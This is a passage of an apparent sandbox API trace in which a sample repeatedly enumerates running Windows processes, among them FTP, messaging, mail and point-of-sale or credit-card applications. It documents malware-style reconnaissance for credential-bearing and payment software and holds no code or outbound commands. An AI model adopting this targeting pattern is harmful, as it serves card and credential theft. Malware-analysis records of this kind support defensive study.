szExeFile="omega hiv.exe")) returned 1 [0105.302] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="strike_grid_ringtones.exe")) returned 1 [0105.302] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reload.exe")) returned 1 [0105.429] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="inner_atomic.exe")) returned 1 [0105.430] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="box_toyota.exe")) returned 1 [0105.431] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="invited-pty-currencies.exe")) returned 1 [0105.432] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0105.433] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0105.434] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0105.435] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0105.436] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0105.438] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0105.439] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0105.440] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0105.441] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0105.442] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0105.443] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0105.444] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0105.445] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0105.446] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0105.447] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0105.448] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0105.449] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0105.450] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0105.451] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0105.453] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0105.454] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0105.455] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0105.456] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0105.457] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0105.459] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0105.633] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0105.635] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0105.637] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0105.638] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0105.640] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0105.641] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0105.643] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0105.645] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0105.646] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0105.648] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0105.649] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0105.651] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0105.652] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0105.654] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0105.655] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0105.657] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0105.658] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0105.659] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="map enquiries.exe")) returned 1 [0105.661] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scenic.exe")) returned 1 [0105.662] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rider.exe")) returned 1 [0105.663] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0105.665] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0105.666] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.667] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0105.669] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhtop32bit.exe")) returned 1 [0105.670] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0105.671] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0105.672] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0105.673] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.674] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0105.676] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.677] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0105.788] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0105.789] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.790] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0105.791] CloseHandle (hObject=0x124) returned 1 [0105.792] GetCurrentThread () returned 0xfffffffe [0105.792] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0105.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0105.912] Process32FirstW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.913] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.914] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.915] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.916] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.917] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.918] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.919] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.920] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.921] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.922] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.923] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.924] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.925] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.926] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.927] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.928] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.940] Process32NextW (in: hSnapshot=0x210, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, 